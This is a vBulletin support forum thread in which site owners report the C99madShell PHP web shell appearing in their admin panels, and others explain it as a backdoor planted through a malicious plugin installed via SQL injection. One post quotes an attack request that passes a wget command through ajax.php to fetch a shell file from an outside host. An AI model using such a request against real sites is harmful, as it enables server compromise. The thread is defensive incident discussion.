Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 21 Jan 2009, 03:04
ryan.gottlieb ryan.gottlieb is offline
 
Join Date: Aug 2007
Real name: Ryan
C99madShell v. 2.0 madnet edition

I upgraded vBulletin 3.8 from 3.7, and now when ever I try to edit subscriptions, this comes up... its a PHP Shell script....

--------------- Added 21 Jan 2009 at 03:08 ---------------

Ok... it was going back to the init.php file, and told me this line


($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false;


I commented that line out (//) and it went away....

--------------- Added 21 Jan 2009 at 03:23 ---------------

solved.... error.php

Last edited by ryan.gottlieb : 21 Jan 2009 at 03:23. Reason: Auto-Merged DoublePost
Reply With Quote
  #2  
Old 21 Jan 2009, 04:04
Dismounted's Avatar
Dismounted Dismounted is offline
 
Join Date: Jun 2005
Real name: Hanson
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.
__________________
View My Modifications
29 Releases and Counting... Latest Modification: dmActivityStream - vBookie Integration (4.x)

Please do not PM me to ask for support - please use the relevant thread or forum.
Reply With Quote
  #3  
Old 27 Jan 2009, 02:33
ryan.gottlieb ryan.gottlieb is offline
 
Join Date: Aug 2007
Real name: Ryan
No, by SOLVED I meant I removed the script.. (The shell script)
Reply With Quote
  #4  
Old 27 Jan 2009, 03:58
Dismounted's Avatar
Dismounted Dismounted is offline
 
Join Date: Jun 2005
Real name: Hanson
That still does not solve how the attacker got the file there. Unless you know that already too?
__________________
View My Modifications
29 Releases and Counting... Latest Modification: dmActivityStream - vBookie Integration (4.x)

Please do not PM me to ask for support - please use the relevant thread or forum.
Reply With Quote
  #5  
Old 23 Aug 2011, 11:50
blowy blowy is offline
 
Join Date: Jun 2011
am having this problem as well.....When I try to edit the payments manager I get the above msg

!C99madShell v. 2.0 madnet edition!

Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13
Reply With Quote
  #6  
Old 24 Aug 2011, 04:56
Marco64Th Marco64Th is offline
 
Join Date: Aug 2011
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.
Reply With Quote
  #7  
Old 24 Aug 2011, 15:01
Crad Crad is offline
 
Join Date: Sep 2009
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
Reply With Quote
  #8  
Old 24 Aug 2011, 16:06
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
Red face

Originally Posted by Crad View Post
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
Tomato, Tomato or Potato, Potato it does not matter, it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter and tbo I have no clue why you even posted that last snippet of quick whit, nothing to cheer about until you've removed it .
__________________
Anti-Spam Methods and Resources
InnovationByInstinct.com - Custom vBulletin Modifications, Styles, and Services.
Skype: innovationbyinstinct

Search - Use the search feature to find similar issues/answers.
Information - Include screenshots, copy/pasted error codes, url etc.
Fixed - Please return to your thread/post and let us know how it was fixed!
Thanks - For participating! Click the "Like" on a post if someone helped you!
Reply With Quote
  #9  
Old 24 Aug 2011, 19:27
daydie's Avatar
daydie daydie is offline
 
Join Date: Oct 2007
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap

Last edited by daydie : 24 Aug 2011 at 19:32.
Reply With Quote
  #10  
Old 25 Aug 2011, 03:51
Marco64Th Marco64Th is offline
 
Join Date: Aug 2011
Originally Posted by Crad View Post
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
A useless discussion on semantics in my view, the poster that asked the question will understand that it is a serious security issue if i use the word "Trojan".

But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data?
Reply With Quote
  #11  
Old 29 Aug 2011, 19:53
ishare ishare is offline
 
Join Date: Jun 2006
Right now i have the exactly same problem. Does anyone know how to solve this problem please ? I am running my own dedicated server but since am not good with server management, i do not have any idea about what to do on server side if it's not about a file removing or something like that...
Reply With Quote
  #12  
Old 29 Aug 2011, 21:29
vbresults's Avatar
vbresults vbresults is offline
 
Join Date: Apr 2009
I saw this for the first time on a client's install two or so months ago. None of the vBulletin files were modified and the database was clean so I was stumped at first. It turns out this particular exploit uses vB's plugin/hook system; if you see a strange plugin (note I said plugin, not product), remove it. Then, find out how it got on there. xD

Just read a document on this exploit; bad file permission or upload script setups could allow something like this to happen.
Reply With Quote
  #13  
Old 30 Aug 2011, 06:52
Fortezza Fortezza is offline
 
Join Date: Aug 2011
I think Shell is malicious
Reply With Quote
  #14  
Old 30 Aug 2011, 09:36
Paul M's Avatar
Paul M Paul M is offline
 
Join Date: Sep 2004
Real name: Paul Marsden
Originally Posted by daydie View Post
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap
You cannot upload files like that with ajax.php unless someone has already compromised you.

What actually happens is they use sql injection via an unsafe modification to install a plugin on the ajax hook, then use that malicious plugin to install the file.

If you forum directory was properly secured as read only (to apache) then that wget would fail to actually save the file.
__________________


Lead Developer, vBulletin.Org & vBulletin.Com
Please do not PM me about custom work - I no longer undertake any.

Note: I will not answer support questions via e-mail or PM - please use the relevant thread or forum.
Cable Forum - DigiGuide
Reply With Quote
  #15  
Old 31 Mar 2012, 18:31
gazza2008 gazza2008 is offline
 
Join Date: Aug 2009
How would I get rid of this ive been comprimised as well...

Is it in a folder in FTP is it a CODE I can delete etc
Reply With Quote
Reply


Similar Threads
Thread Thread Starter Forum Replies Last Post
PM Preview 3.5 Edition BluPhoenix vBulletin 3.5 Add-ons 92 30 May 2010 07:34
Let me google that for you - AME Edition Vitaly vBulletin 3.7 Add-ons 6 08 Feb 2009 11:13

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
Forum Jump


New To Site? Need Help?

All times are GMT. The time now is 10:48.

Layout Options | Width: Wide Color: